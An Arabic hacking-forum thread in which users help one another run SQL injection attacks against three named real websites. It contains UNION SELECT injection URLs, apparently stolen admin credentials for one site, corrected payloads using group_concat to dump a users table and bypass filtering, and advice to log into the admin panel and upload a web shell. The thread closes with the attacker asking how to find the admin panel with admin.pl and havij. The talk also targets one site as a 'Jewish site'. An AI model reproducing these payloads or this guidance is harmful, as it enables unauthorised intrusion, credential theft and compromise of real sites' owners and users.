:: vBspiders Professional Network :: - مشاكل في sql injection

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)

- - مشاكل في sql injection (http://www.vbspiders.com/vb/t60308.html)

مشاكل في sql injection

السلام عليكم

المشكلة الأولى

المعلومات التي وجدتها على هدى الموقع اليهودي

http://www.israel-diaspora.info/arti...,9,10,11,12,13

community.5.0.92
password>lelien_isradiasp>userkeys
login:redacteur
password:pascale+
www.israel-diaspora.info/cpanel

لكن عندما أقوم بإذخال user وpassword
Login Attempt Failed!
----------------------------------------------------------------------

---------------
المشكلة الثانية

http://www.tsume-art.com/fr/gallery.php?s=-1+union+select+1,2,3--

عدم ضهور الأعمدة المصابة
----------------------------------------------------------------------

----------------
المشكلة التالتة

http://www.chronicart.com/webmag/article.php?id=-

1734+UNION+SELECT+1,2,3,4,5,8,7,8,9,10

post_password>chronicart>ca_posts

http://www.chronicart.com/webmag/article.php?id=-

1734+UNION+SELECT+1,2,3,4,5,post_password,7,8,9,10 +from+ca_posts--

عدم ضهور password

وشكرا على كل حال

رد: مشاكل في sql injection

بالنسبه للموقع الاول الاعمده تظهر عاددي رقم العمود المصاب هو 4+9+2+3

رد: مشاكل في sql injection

بالنسبه للموقع الثاني شوف حبيبي انت اخترت جدول خطا في جدول اسمه ca_users
راح تقولي كيف طلعته اسخدم الامر group قبل concat يعني راح يصير كذا

اقتباس:

Group_concat(table_name,0x3a,column_name,0x3a,tabl e_schema

وهذه الحقنه النهائيه

اقتباس:

http://www.chronicart.com/webmag/art...rom+ca_users--

رد: مشاكل في sql injection

وهذه الحقنه النهائيه للموقع الاسرائيلي

اقتباس:

http://www.israel-diaspora.info/arti...rom+userkeys--

واستخدمت الامر group ارجو ان تستخدمه كل مهر فهو يجمع الجداول ويتخطى الفلتره

رد: مشاكل في sql injection

شوف دورة اخونا فولكانو

رد: مشاكل في sql injection

أشكركم يا إخوتي على المساعدة
وسوف أرى دورة فولكانو
و لكن سؤالي في الموقع الأول هو عندما أقوم بإذخال user وpassword
في ال cpanel تخرج رسالة تقول فشل محاولة تسجيل الدخول

رد: مشاكل في sql injection

اقتباس:

المشاركة الأصلية كتبت بواسطة booba007 (المشاركة 421808)

لانو مسار السي بنل مو لحة الادمن

رد: مشاكل في sql injection

ما الفرق بين cpanel و لوحة الادمن
هل يمكنك مساعدتي في إيجاد لوحة الادمن لقد بحت عنه بالبرنامج admin.pl لكن لم أجده
و شكرا على الرد

رد: مشاكل في sql injection

اقتباس:

المشاركة الأصلية كتبت بواسطة booba007 (المشاركة 421821)

نعم هناك فرق كبير أخي الكريم.

لوحة السي بنل cpanel هي اللوحة الأم للموقع ويمكن من خلال هذه اللوحة عمل أشياء كثيرة مثل عمل حسابات ftp او عمل سب دومين او إنشاء قاعدة بيانات والكثير .

اما بالنسبة للحقنه التي استخرجته منها اليوزر والباسورد فهي لقاعدة بيانات احدى السكربتات التي قام بتركيبها صاحب الموقع. وهذا السكربت وكل سكربت له لوحة تحكم تتحكم في عمل السكربت من مواضيع او ردود او رفع ملفات وصور. ومن خلال حقنك للسكربت واستخراج اليوزر والباسورد فقط اذهب إلى لوحة التحكم الخاصة لهذا ( السكربت ) وليس السي بنل لان السي بنل ليس له علاقة. ثم بعد ذلك ضع اليوزر والباسورد في لوحة التحكم تبع السكربت وسوف يتم الدخول وبعد الدخول قم برفع شل او كما تشاء.

بالتوفيق.Dr.NaNo

رد: مشاكل في sql injection

اقتباس:

المشاركة الأصلية كتبت بواسطة Dr.NaNo (المشاركة 421853)

شكرا يا أخي على شرحك الواضح
لكن لم أجد مسار لوحة الادمن لهذ الموقع
http://www.israel-diaspora.info
لقد بحت عنه بالبرنامج admin.pl و havij
هل توجد طريقة لإيجاد مسار لوحة الادمن عن طريق الحقن أم لا توضع المسارات في قاعدة بيانات
و شكرا